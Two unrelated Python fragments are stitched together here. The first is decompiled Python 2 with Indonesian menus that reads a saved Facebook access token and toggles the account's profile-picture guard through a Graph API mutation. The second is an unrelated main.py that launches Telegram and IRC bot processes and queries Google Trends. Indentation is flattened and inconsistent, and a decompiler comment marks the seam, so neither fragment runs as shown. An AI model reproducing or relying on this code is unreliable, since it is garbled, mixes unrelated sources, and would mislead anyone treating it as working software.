raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Aktifkan'
print '\x1b[1;37;40m2. NonAktifkan'
print '\x1b[1;31;40m0. Kembali'
print
g = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
    if g == '1':
        aktif = 'true'
        gaz(toket, aktif)
    elif g == '2':
        non = 'false'
        gaz(toket, non)
    elif g == '0':
        lain()
    else:
        keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDiaktifkan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
lain()
    elif '"is_shielded":false' in res.text:
        os.system('clear')
        print logo
        print 40 * '\x1b[1;97m\xe2\x95\x90'
        print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDinonaktifkan'
        raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
        lain()
    else:
        print '\x1b[1;91m[!] Error'
        keluar()
if __name__ == '__main__':
login()
# okay decompiling 3.pyc
main.py
# main.py
import datetime
# import whois
import json
import socket
import time
import traceback
from random import choice
from threading import Thread
from urllib.parse import quote as urlencode
from urllib.parse import unquote
from urllib.error import URLError
import pytz
import requests
import socks
import subprocess
from pytrends.request import TrendReq
import settings
import translate_krzb
from settings import settings as option
from settings import getconfig
from helpers import get_pretty_json_string, shell
from tgbich import run_tgbich
from ircbich import ircbich_init_and_loop
functions = {'tg': run_tgbich, 'irc': ircbich_init_and_loop}
print(f"{__file__}, {__name__}: starting")
from multiprocessing import Process
import os
print(f"{__file__}, {__name__}: pytrends: processing Trend Requests")
while True:
try:
pytrends = TrendReq(hl='ru-RU', tz=360)
break
except KeyboardInterrupt as e:
raise e
except:
traceback.print_exc()
TIME_TO_SLEEP_SECONDS = 1
print("sleeping %s seconds" % str(TIME_TO_SLEEP_SECONDS))
time.sleep(TIME_TO_SLEEP_SECONDS)
continue
print(f"{__file__}, {__name__}: pytrends: completed.")
# launch processes
def launch_all():
print("processing configs")
cfg = getconfig()
print("processing connections")
connections = cfg["connections"]
for key in connections.keys():
print(f"processing connections.{key}")
section = connections[key]
for section_key in section.keys():
print(f" processing connections.{key}.{section_key}")
conn_props = section[section_key]
print(f" launching connection {key}.{section_key}, conn_props='{conn_props}'")
Process(target=functions[key], args=(key, conn_props, cfg, )).start()
print(f" launched connection {key}.{section_key}")
print(f" processed connections.{key}.{section_key}")
print(f"processed connections.{key}")
print("all launched; processed all connections")